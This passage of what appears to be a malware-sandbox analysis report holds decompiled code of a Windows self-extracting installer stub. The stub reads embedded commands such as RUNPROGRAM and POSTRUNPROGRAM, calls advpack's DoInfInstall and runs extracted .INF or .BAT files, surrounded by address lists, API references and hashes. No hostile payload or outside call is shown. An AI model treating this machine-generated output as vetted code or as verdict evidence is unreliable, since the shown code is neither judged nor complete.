                                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                                      				signed int _t157;
                                                                                                                                                                                                      				signed int _t162;
                                                                                                                                                                                                      				signed int _t164;
                                                                                                                                                                                                      				void* _t165;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                      				_t69 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                      				_t153 = 0;
                                                                                                                                                                                                      				 *0xa69124 =  *0xa69124 & 0;
                                                                                                                                                                                                      				_t149 = 0;
                                                                                                                                                                                                      				_v388 = 0;
                                                                                                                                                                                                      				_v384 = 0;
                                                                                                                                                                                                      				_t165 =  *0xa68a28 - _t153; // 0x0
                                                                                                                                                                                                      				if(_t165 != 0) {
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t127 = 0;
                                                                                                                                                                                                      					_v392 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                      						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                      						_t164 = _t164 + 0xc;
                                                                                                                                                                                                      						_v348 = 0x44;
                                                                                                                                                                                                      						if( *0xa68c42 != 0) {
                                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t146 =  &_v396;
                                                                                                                                                                                                      						_t115 = E00A6468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							_t146 = 0x4b1;
                                                                                                                                                                                                      							E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      							 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      							goto L62;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(_v396 != 1) {
                                                                                                                                                                                                      								__eflags = _v396 - 2;
                                                                                                                                                                                                      								if(_v396 != 2) {
                                                                                                                                                                                                      									_t137 = 3;
                                                                                                                                                                                                      									__eflags = _v396 - _t137;
                                                                                                                                                                                                      									if(_v396 == _t137) {
                                                                                                                                                                                                      										_v304 = 1;
                                                                                                                                                                                                      										_v300 = _t137;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(6);
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								_pop(0);
                                                                                                                                                                                                      								goto L11;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								L11:
                                                                                                                                                                                                      								_v300 = 0;
                                                                                                                                                                                                      								L14:
                                                                                                                                                                                                      								if(_t127 != 0) {
                                                                                                                                                                                                      									L27:
                                                                                                                                                                                                      									_t155 = 1;
                                                                                                                                                                                                      									__eflags = _t127 - 1;
                                                                                                                                                                                                      									if(_t127 != 1) {
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t132 =  &_v280;
                                                                                                                                                                                                      										_t76 = E00A61AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                      										__eflags = _t76;
                                                                                                                                                                                                      										if(_t76 == 0) {
                                                                                                                                                                                                      											L62:
                                                                                                                                                                                                      											_t77 = 0;
                                                                                                                                                                                                      											L63:
                                                                                                                                                                                                      											_pop(_t150);
                                                                                                                                                                                                      											_pop(_t156);
                                                                                                                                                                                                      											_pop(_t128);
                                                                                                                                                                                                      											return E00A66CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t157 = _v404;
                                                                                                                                                                                                      										__eflags = _t149;
                                                                                                                                                                                                      										if(_t149 != 0) {
                                                                                                                                                                                                      											L37:
                                                                                                                                                                                                      											__eflags = _t157;
                                                                                                                                                                                                      											if(_t157 == 0) {
                                                                                                                                                                                                      												L57:
                                                                                                                                                                                                      												_t151 = _v408;
                                                                                                                                                                                                      												_t146 =  &_v352;
                                                                                                                                                                                                      												_t130 = _t151; // executed
                                                                                                                                                                                                      												_t79 = E00A63FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                      												__eflags = _t79;
                                                                                                                                                                                                      												if(_t79 == 0) {
                                                                                                                                                                                                      													L61:
                                                                                                                                                                                                      													LocalFree(_t151);
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												L58:
                                                                                                                                                                                                      												LocalFree(_t151);
                                                                                                                                                                                                      												_t127 = _t127 + 1;
                                                                                                                                                                                                      												_v396 = _t127;
                                                                                                                                                                                                      												__eflags = _t127 - 2;
                                                                                                                                                                                                      												if(_t127 >= 2) {
                                                                                                                                                                                                      													_t155 = 1;
                                                                                                                                                                                                      													__eflags = 1;
                                                                                                                                                                                                      													L69:
                                                                                                                                                                                                      													__eflags =  *0xa68580;
                                                                                                                                                                                                      													if( *0xa68580 != 0) {
                                                                                                                                                                                                      														E00A62267();
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													_t77 = _t155;
                                                                                                                                                                                                      													goto L63;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t153 = _v392;
                                                                                                                                                                                                      												_t149 = _v388;
                                                                                                                                                                                                      												continue;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											L38:
                                                                                                                                                                                                      											__eflags =  *0xa68180;
                                                                                                                                                                                                      											if( *0xa68180 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c7;
                                                                                                                                                                                                      												E00A644B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                      												LocalFree(_v424);
                                                                                                                                                                                                      												 *0xa69124 = 0x8007042b;
                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t157;
                                                                                                                                                                                                      											if(_t157 == 0) {
                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xa69a34 & 0x00000004;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t129 = E00A66495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                      											__eflags = _t129;
                                                                                                                                                                                                      											if(_t129 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c8;
                                                                                                                                                                                                      												E00A644B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                      												L65:
                                                                                                                                                                                                      												LocalFree(_v408);
                                                                                                                                                                                                      												 *0xa69124 = E00A66285();
                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                      											_v404 = _t146;
                                                                                                                                                                                                      											__eflags = _t146;
                                                                                                                                                                                                      											if(_t146 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c9;
                                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                                      												E00A644B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                      												FreeLibrary(_t129);
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xa68a30;
                                                                                                                                                                                                      											_t151 = _v408;
                                                                                                                                                                                                      											_v384 = 0;
                                                                                                                                                                                                      											_v368 =  &_v280;
                                                                                                                                                                                                      											_t96 =  *0xa69a40; // 0x3
                                                                                                                                                                                                      											_v364 = _t96;
                                                                                                                                                                                                      											_t97 =  *0xa68a38 & 0x0000ffff;
                                                                                                                                                                                                      											_v380 = 0xa69154;
                                                                                                                                                                                                      											_v376 = _t151;
                                                                                                                                                                                                      											_v372 = 0xa691e4;
                                                                                                                                                                                                      											_v360 = _t97;
                                                                                                                                                                                                      											if( *0xa68a30 != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t144 =  *0xa69a34; // 0x1
                                                                                                                                                                                                      											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t145 =  *0xa68d48; // 0x0
                                                                                                                                                                                                      											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t145;
                                                                                                                                                                                                      											if(_t145 < 0) {
                                                                                                                                                                                                      												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                      												__eflags = _t104;
                                                                                                                                                                                                      												_v360 = _t104;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t98 =  *0xa69a38; // 0x0
                                                                                                                                                                                                      											_v356 = _t98;
                                                                                                                                                                                                      											_t130 = _t146;
                                                                                                                                                                                                      											 *0xa6a288( &_v384);
                                                                                                                                                                                                      											_t101 = _v404();
                                                                                                                                                                                                      											__eflags = _t164 - _t164;
                                                                                                                                                                                                      											if(_t164 != _t164) {
                                                                                                                                                                                                      												_t130 = 4;
                                                                                                                                                                                                      												asm("int 0x29");
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											 *0xa69124 = _t101;
                                                                                                                                                                                                      											_push(_t129);
                                                                                                                                                                                                      											__eflags = _t101;
                                                                                                                                                                                                      											if(_t101 < 0) {
                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                      												goto L61;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                      												_t127 = _v400;
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags =  *0xa69a40 - 1; // 0x3
                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags =  *0xa68a20;
                                                                                                                                                                                                      										if( *0xa68a20 == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t157;
                                                                                                                                                                                                      										if(_t157 != 0) {
                                                                                                                                                                                                      											goto L38;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      										E00A6202A(_t146); // executed
                                                                                                                                                                                                      										goto L37;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v280;
                                                                                                                                                                                                      									_t108 = E00A6468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                      									__eflags = _t108;
                                                                                                                                                                                                      									if(_t108 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xa68c42;
                                                                                                                                                                                                      									if( *0xa68c42 != 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                      									__eflags = _t112 == 0;
                                                                                                                                                                                                      									if(_t112 == 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L31;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t118 =  *0xa68a38; // 0x0
                                                                                                                                                                                                      								if(_t118 == 0) {
                                                                                                                                                                                                      									L23:
                                                                                                                                                                                                      									if(_t153 != 0) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E00A6468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                      										goto L27;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L25;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                      									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                      									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00A6468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00A61781( &_v276, 0x104, _t130, 0xa68c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00A6468F(_t130, 0xa69a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}
                                                                                                                                                                                                      0x00a63f76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63f76
                                                                                                                                                                                                      0x00a63e3c
                                                                                                                                                                                                      0x00a63e43
                                                                                                                                                                                                      0x00a63e47
                                                                                                                                                                                                      0x00a63e52
                                                                                                                                                                                                      0x00a63e56
                                                                                                                                                                                                      0x00a63e5c
                                                                                                                                                                                                      0x00a63e61
                                                                                                                                                                                                      0x00a63e68
                                                                                                                                                                                                      0x00a63e70
                                                                                                                                                                                                      0x00a63e74
                                                                                                                                                                                                      0x00a63e7c
                                                                                                                                                                                                      0x00a63e80
                                                                                                                                                                                                      0x00a63e82
                                                                                                                                                                                                      0x00a63e82
                                                                                                                                                                                                      0x00a63e87
                                                                                                                                                                                                      0x00a63e87
                                                                                                                                                                                                      0x00a63e8b
                                                                                                                                                                                                      0x00a63e91
                                                                                                                                                                                                      0x00a63e94
                                                                                                                                                                                                      0x00a63e96
                                                                                                                                                                                                      0x00a63e96
                                                                                                                                                                                                      0x00a63e9b
                                                                                                                                                                                                      0x00a63e9b
                                                                                                                                                                                                      0x00a63e9f
                                                                                                                                                                                                      0x00a63ea2
                                                                                                                                                                                                      0x00a63ea4
                                                                                                                                                                                                      0x00a63ea4
                                                                                                                                                                                                      0x00a63ea9
                                                                                                                                                                                                      0x00a63ea9
                                                                                                                                                                                                      0x00a63ead
                                                                                                                                                                                                      0x00a63eb3
                                                                                                                                                                                                      0x00a63eb6
                                                                                                                                                                                                      0x00a63eb8
                                                                                                                                                                                                      0x00a63eb8
                                                                                                                                                                                                      0x00a63ebd
                                                                                                                                                                                                      0x00a63ebd
                                                                                                                                                                                                      0x00a63ec1
                                                                                                                                                                                                      0x00a63ec3
                                                                                                                                                                                                      0x00a63ec5
                                                                                                                                                                                                      0x00a63ec5
                                                                                                                                                                                                      0x00a63eca
                                                                                                                                                                                                      0x00a63eca
                                                                                                                                                                                                      0x00a63ece
                                                                                                                                                                                                      0x00a63ed5
                                                                                                                                                                                                      0x00a63ed9
                                                                                                                                                                                                      0x00a63ee0
                                                                                                                                                                                                      0x00a63ee6
                                                                                                                                                                                                      0x00a63eea
                                                                                                                                                                                                      0x00a63eec
                                                                                                                                                                                                      0x00a63eee
                                                                                                                                                                                                      0x00a63ef3
                                                                                                                                                                                                      0x00a63ef3
                                                                                                                                                                                                      0x00a63ef5
                                                                                                                                                                                                      0x00a63efa
                                                                                                                                                                                                      0x00a63efb
                                                                                                                                                                                                      0x00a63efd
                                                                                                                                                                                                      0x00a63f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63eff
                                                                                                                                                                                                      0x00a63eff
                                                                                                                                                                                                      0x00a63f05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63f05
                                                                                                                                                                                                      0x00a63efd
                                                                                                                                                                                                      0x00a63dc7
                                                                                                                                                                                                      0x00a63dce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63dd0
                                                                                                                                                                                                      0x00a63dd7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63dd9
                                                                                                                                                                                                      0x00a63ddb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63ddd
                                                                                                                                                                                                      0x00a63de1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63de1
                                                                                                                                                                                                      0x00a63d59
                                                                                                                                                                                                      0x00a63d65
                                                                                                                                                                                                      0x00a63d6a
                                                                                                                                                                                                      0x00a63d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63d6e
                                                                                                                                                                                                      0x00a63d75
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63d8f
                                                                                                                                                                                                      0x00a63d96
                                                                                                                                                                                                      0x00a63d98
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63d98
                                                                                                                                                                                                      0x00a63c8f
                                                                                                                                                                                                      0x00a63c98
                                                                                                                                                                                                      0x00a63cf1
                                                                                                                                                                                                      0x00a63cf3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63cfe
                                                                                                                                                                                                      0x00a63d11
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63d11
                                                                                                                                                                                                      0x00a63c9c
                                                                                                                                                                                                      0x00a63ca5
                                                                                                                                                                                                      0x00a63ca7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63cad
                                                                                                                                                                                                      0x00a63cb2
                                                                                                                                                                                                      0x00a63cb7
                                                                                                                                                                                                      0x00a63cc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63ce8
                                                                                                                                                                                                      0x00a63cec
                                                                                                                                                                                                      0x00a63ced
                                                                                                                                                                                                      0x00a63ced
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63ce8
                                                                                                                                                                                                      0x00a63c9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63c9e
                                                                                                                                                                                                      0x00a63c56
                                                                                                                                                                                                      0x00a63d35

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A63C11
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A63CDC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A68C42), ref: 00A63D8F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A63E26
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00A68C42), ref: 00A63EFF
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00A68C42), ref: 00A63F1F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00A68C42), ref: 00A63F40
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00A68C42), ref: 00A63F47
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A68C42), ref: 00A63F76
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A68C42), ref: 00A63F80
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A68C42), ref: 00A63FC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                      • API String ID: 1032054927-727772788
                                                                                                                                                                                                      • Opcode ID: 77d49df9f4bf368e86e1abc2c735a5e419e3678bd29f3bfb6162c458b16da989
                                                                                                                                                                                                      • Instruction ID: 96b01e60696b2392ea4465ec72904aea31237fb043ecb3ac6997bea6d4954519
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77d49df9f4bf368e86e1abc2c735a5e419e3678bd29f3bfb6162c458b16da989
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BB11272A083009FDB20DF64C945B6B7AF8EB95740F100A2DFA95D61D1DBB4CA47CB92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00A61AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                      				CHAR** _v1564;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				CHAR* _t53;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				char* _t57;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				CHAR* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				signed char _t65;
                                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                                      				CHAR* _t90;
                                                                                                                                                                                                      				CHAR* _t92;
                                                                                                                                                                                                      				char _t105;
                                                                                                                                                                                                      				char _t106;
                                                                                                                                                                                                      				CHAR** _t111;
                                                                                                                                                                                                      				CHAR* _t115;
                                                                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                      				CHAR* _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				void* _t138;
                                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				intOrPtr* _t146;
                                                                                                                                                                                                      				char* _t148;
                                                                                                                                                                                                      				CHAR* _t151;
                                                                                                                                                                                                      				void* _t152;
                                                                                                                                                                                                      				CHAR* _t155;
                                                                                                                                                                                                      				CHAR* _t156;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t48 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                      				_t108 = __ecx;
                                                                                                                                                                                                      				_v1564 = _a4;
                                                                                                                                                                                                      				_v1560 = _a8;
                                                                                                                                                                                                      				E00A61680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                      				if(_v528 != 0x22) {
                                                                                                                                                                                                      					_t135 = " ";
                                                                                                                                                                                                      					_t53 =  &_v528;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t135 = "\"";
                                                                                                                                                                                                      					_t53 =  &_v527;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t111 =  &_v1556;
                                                                                                                                                                                                      				_v1556 = _t53;
                                                                                                                                                                                                      				_t54 = E00A61A84(_t111, _t135);
                                                                                                                                                                                                      				_t156 = _v1556;
                                                                                                                                                                                                      				_t151 = _t54;
                                                                                                                                                                                                      				if(_t156 == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_push(_t111);
                                                                                                                                                                                                      					E00A61781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      					E00A6658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t132 = _t156;
                                                                                                                                                                                                      					_t148 =  &(_t132[1]);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t105 =  *_t132;
                                                                                                                                                                                                      						_t132 =  &(_t132[1]);
                                                                                                                                                                                                      					} while (_t105 != 0);
                                                                                                                                                                                                      					_t111 = _t132 - _t148;
                                                                                                                                                                                                      					if(_t111 < 3) {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t106 = _t156[1];
                                                                                                                                                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						E00A61680( &_v268, 0x104, _t156);
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t138 = 0x2e;
                                                                                                                                                                                                      						_t57 = E00A666C8(_t156, _t138);
                                                                                                                                                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                      							_t139 = 0x2e;
                                                                                                                                                                                                      							_t115 = _t156;
                                                                                                                                                                                                      							_t58 = E00A666C8(_t115, _t139);
                                                                                                                                                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									goto L43;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                      									E00A61680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_push(_t115);
                                                                                                                                                                                                      									_t108 = 0x400;
                                                                                                                                                                                                      									E00A61781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                      										E00A616B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                      										E00A616B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = _t156;
